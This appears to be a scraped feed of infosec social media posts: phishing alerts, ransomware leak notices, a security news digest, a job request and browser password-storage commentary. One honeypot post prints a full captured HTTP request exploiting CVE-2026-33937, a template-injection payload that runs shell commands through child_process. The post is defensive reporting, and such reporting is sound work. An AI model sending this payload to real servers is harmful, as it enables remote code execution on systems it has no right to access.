Possible Phishing on: ️hxxps[:]//netflix-clone-beige-ten[.]vercel[.]app/ 🧬 Analysis at: https://urldna.io/scan/69fa06243b7750000268aa8b#cybersecurity #phishing #infosec #urldna #scam #infosec

hey so. looking for a job (NZ or fully remote willing to hire a kiwi) in SRE, security, or linux/Unix system administration. 15 years experience administering Linux and Unix boxes, intermediate level of experience working with docker compose and containerisation and container security. No prior job experience unfortunately, all those 15 years were mostly personal projects and small-scale stuff for friends. I'm also 26, so I started when I was 11, explaining the no jobs so far. Currently running an entire multi-machine personal cloud infrastructure with a demonstration of all the services I have running at https://status.highenergymagic.net. Three machines, 72 docker containers. One running most of them, one running Mastodon+glitchsocial, one running the uptime monitor. encrypted root on ZFS, alpine linux, gVisor on supported containers, plan to move to Kata. Entirely willing to accept entry-level job placements, no expectation of being paid a lot or anything, just want to be doing something and move the needle a little on my current "being broke" status. Currently using gVisor, docker compose, and kata containers in production, experience with Linux, docker, Net/Open/FreeBSD, Cisco IOS, Juniper Junos, Mikrotik and UniFi, configuring and administering Asterisk, plus extensive experience with IBM AIX and Sun Solaris. #fedihired #infosec #cybersecurity #linux #unix #docker #sre #DevOps #GetFediHiredPlease boost for reach, any job offers please DM me.

Champion Homes Data Breach: DragonForce Ransomware Leaks 44GB of DataAustralian home builder Champion Homes confirmed a data breach after the DragonForce ransomware group stole and leaked 44 GB of sensitive payroll, tender, and customer data.****#cybersecurity #infosec #incident #ransomwarehttps://beyondmachines.net/event_details/champion-homes-data-breach-dragonforce-ransomware-leaks-44gb-of-sensitive-records-w-8-2-w-y/gD2P6Ple2L

ASN: AS14956Location: Dallas, USAdded: 2026-05-03T12:33#shodansafari #infosec

Possible Phishing on: ️hxxps[:]//netflix-sandy-gamma[.]vercel[.]app/ 🧬 Analysis at: https://urldna.io/scan/69fa0ddf3b7750000872d4e3#cybersecurity #phishing #infosec #urldna #scam #infosec

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937 Here is a full request:POST /api/email/preview HTTP/1.1Host: x.x.x.x:8080Connection: closeContent-Length: 585Content-Type: application/jsonUser-Agent: Go-http-client/1.1{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}#dfir #honeypot #infosec #cybersecurity

The cybersecurity researcher posted something about this on X yesterday. "Rønning clarifies that Edge decrypts every credential at startup, regardless of whether you visit a site using those credentials. This doesn't mean that one can simply access those passwords with little know-how, though. A user needs administrative access to a terminal server, which is already a major breach on a computer, but from here, "they can access the memory of all logged‑on user processes."PC Gamer: Microsoft Edge saves passwords in cleartext 'by design' and researchers argue 'this turns into a credential harvest' on shared PCs https://www.pcgamer.com/hardware/microsoft-edge-saves-passwords-in-cleartext-by-design-and-researchers-argue-this-turns-into-a-credential-harvest-on-shared-pcs/ #Microsoft #infosec #Edge

THREAT INTEL | maiadouro.pt🟢 Actor "safepay" claims Undisclosed️ Unverified claimhttps://www.yazoul.net/intel/claim/2026-05-05-maiadouro-ransomware-attack-by-safepay-may-2026#DarkWeb #DataBreach #ThreatIntel #CyberSecurity #InfoSec

Security News Digest - 2026-05-05 26 updates from 7 sources: BleepingComputer: Karakurt extortion gang ‘cold case’ negotiator gets 8.5 years in prison https://www.bleepingcomputer.com/news/security/karakurt-extortion-gang-negotiator-sentenced-to-85-years-in-prison/ The Hacker News: We Scanned 1 Million Exposed AI Services. Here's How Bad the Security Actually Is https://thehackernews.com/2026/05/we-scanned-1-million-exposed-ai.html SecurityWeek: Karakurt Ransomware Negotiator Sentenced to Prison https://www.securityweek.com/karakurt-ransomware-negotiator-sentenced-to-prison/ SecurityWeek: Critical, High-Severity Vulnerabilities Patched in Apache MINA, HTTP Server https://www.securityweek.com/critical-high-severity-vulnerabilities-patched-in-apache-mina-http-server/ BleepingComputer: Google now offers up to $1.5 million for some Android exploits https://www.bleepingcomputer.com/news/security/google-now-offers-up-to-15-million-for-some-android-exploits/🦠 Malwarebytes: Update WhatsApp now: Two new flaws could expose you to malicious files https://www.malwarebytes.com/blog/news/2026/05/update-whatsapp-now-two-new-flaws-could-expose-you-to-malicious-files The Hacker News: MetInfo CMS CVE-2026-29014 Exploited for Remote Code Execution Attacks https://thehackernews.com/2026/05/metinfo-cms-cve-2026-29014-exploited.html darkreading: How the Story of a USB Penetration Test Went Viral https://www.darkreading.com/cyberattacks-data-breaches/how-story-usb-penetration-test-went-viral The Hacker News: The Back Door Attackers Know About — and Most Security Teams Still Haven’t Closed https://thehackernews.com/2026/05/the-back-door-attackers-know-about-and.html SecurityWeek: Critical Remote Code Execution Vulnerability Patched in Android https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/ SecurityWeek: Critical Bug Could Expose 300,000 Ollama Deployments to Information Theft https://www.securityweek.com/critical-bug-could-expose-300000-ollama-deployments-to-information-theft/ The Record from Recorded Future News: Australia launches cyber review board modeled on version disbanded in US https://therecord.media/australia-launches-cyber-review-board BleepingComputer: Vimeo data breach exposes personal information of 119,000 people https://www.bleepingcomputer.com/news/security/vimeo-data-breach-exposes-personal-information-of-119-000-people/ SecurityWeek: Hacker Conversations: Joey Melo on Hacking AI https://www.securityweek.com/hacker-conversations-joey-melo-on-hacking-ai/ Security News | TechCrunch: 4 days left: Get 50% off a second TechCrunch Disrupt 2026 pass to make more deals faster https://techcrunch.com/2026/05/05/4-days-left-get-50-off-a-second-techcrunch-disrupt-2026-pass-to-make-more-deals-faster/ BleepingComputer: The EOL Blind Spot in Your CVE Feed: What SCA Tools Don't Check. https://www.bleepingcomputer.com/news/security/the-eol-blind-spot-in-your-cve-feed-what-sca-tools-dont-check/ The Hacker News: China-Linked UAT-8302 Targets Governments Using Shared APT Malware Across Regions https://thehackernews.com/2026/05/china-linked-uat-8302-targets.html Security News | TechCrunch: Hackers steal students’ data during breach at education tech giant Instructure https://techcrunch.com/2026/05/05/hackers-steal-students-data-during-breach-at-education-tech-giant-instructure/ BleepingComputer: FTC to ban data broker Kochava from selling Americans’ location data https://www.bleepingcomputer.com/news/security/ftc-to-ban-data-broker-kochava-from-selling-americans-location-data/ SecurityWeek: Microsoft Warns of Sophisticated Phishing Campaign Targeting US Organizations https://www.securityweek.com/microsoft-warns-of-sophisticated-phishing-campaign-targeting-us-organizations/ darkreading: Microsoft Edge Stores Passwords in Process Memory, Posing Enterprise Risk https://www.darkreading.com/cyber-risk/microsoft-edge-passwords-enterprise-risk Security News | TechCrunch: Kaspersky suspects Chinese hackers planted a backdoor into Daemon Tools in ‘widespread’ attack https://techcrunch.com/2026/05/05/kaspersky-suspects-chinese-hackers-planted-a-backdoor-into-daemon-tools-in-widespread-attack/ The Hacker News: DAEMON Tools Supply Chain Attack Compromises Official Installers with Malware https://thehackernews.com/2026/05/daemon-tools-supply-chain-attack.html The Hacker News: Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html The Record from Recorded Future News: Conti, Akira ransomware affiliate given 8-year sentence https://therecord.media/conti-akira-ransomware-affiliate-sentenced BleepingComputer: Student hacked Taiwan high-speed rail to trigger emergency brakes https://www.bleepingcomputer.com/news/security/student-hacked-taiwan-high-speed-rail-to-trigger-emergency-brakes/#InfoSec #SecurityNews

New.Any.Run: New Phishing Campaign Targets US with Credential Theft: What CISOs Need to Know https://any.run/cybersecurity-blog/us-fake-invitation-phishing/ @anyrun_app #infosec #malware #threatresearch #phishing

New.Zscaler: Malicious OpenClaw Skill Distributes Remcos RAT and GhostLoader https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader #infosec #OpenClaw #threatresearch

New security advisory:CVE-2026-42810 affects multiple systems.• Impact: Remote code execution or complete system compromise possible• Risk: Attackers can gain full control of affected systems• Mitigation: Patch immediately or isolate affected systemsFull breakdown:https://www.yazoul.net/advisory/cve/cve-2026-42810-apache-polaris-leaks-s3-cross-table-data#InfoSec #ZeroDay #ThreatIntel

@ChristosArgyrop ...At Chrome's scale, the climate bill for one model push, paid in atmospheric CO2 by the entire planet, is between six thousand and sixty thousand tonnes of CO2-equivalent emissions, depending on how many devices receive the push...#ai #climatechange

RFC 1178 (1990): Choosing a Name for Your Computer.Three decades later, the advice still holds. #cybersecurity #infosec #security #rfc #rfc1178

ASN: AS134756Location: Shanghai, CNAdded: 2026-05-03T12:38#shodansafari #infosec

Possible Phishing on: ️hxxps[:]//t[.]me/GNSAICloubSIG 🧬 Analysis at: https://urldna.io/scan/69f91ea23b7750000610a2a7#cybersecurity #phishing #infosec #urldna #scam #infosec

@kaidenshi @KF0UNK It's been ages since I looked at Firefox's password storage and that was before they moved to a multi-process architecture. Back then, a JavaScript sandbox escape could leak all passwords. From a quick skim of their docs, they encrypt the passwords on disk. It looks as if protecting the key that they're encrypted with from an attacker with local filesystem access requires you to set a primary password (which is presumably hashed and fed to a KDF to generate the keys), but that key will be in memory for at least one process.

Released in December by @owasp #GenAI Security Project, the #OWASP Agentic Top 10 framework identifies the 10 highest-impact risks facing autonomous #AI systems. The top 2 #infosec risks: Agent Goal Hijack & Tool Misuse and Exploitation. HT @AGATSoftware. https://api.cyfluencer.com/s/ai-security-suite-secure-ai-agents-models-and-usage-27150

In case you forget that there's a ransomware scourge at large, Johnson & Johnson Innovative Medicine has been targeted https://www.ransomware.live/id/Sm9obnNvbiAmIEpvaG5zb24gSW5ub3ZhdGl2ZSBNZWRpY2luZUBzcGFjZWJlYXJzAlso:- US City of Sandstone, MA https://www.ransomware.live/id/Q2l0eSBvZiBTYW5kc3RvbmVAcWlsaW4- Royal M Hotel Fujairah https://www.ransomware.live/id/Uk9ZQUwgTSBIT1RFTCBCWSBHRVdBTiBGVUpBSVJBSCBMTENAbGFtYXNodHU- Cushman & Wakefield (blame Salesforce) https://www.ransomware.live/id/Q3VzaG1hbiAmIFdha2VmaWVsZCBJbmMuQHNoaW55aHVudGVycwMore at Ransomware.live https://www.ransomware.live/ #infosec #ransomware

ASN: AS47516Location: Bursa, TRAdded: 2026-05-03T12:28#shodansafari #infosec